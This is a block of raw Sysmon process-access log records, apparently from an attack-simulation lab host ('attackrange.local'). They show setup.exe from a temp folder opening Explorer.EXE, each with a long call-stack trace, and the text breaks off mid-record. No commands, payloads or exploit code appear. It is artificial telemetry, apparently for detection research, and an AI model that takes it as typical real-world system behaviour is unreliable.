13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.d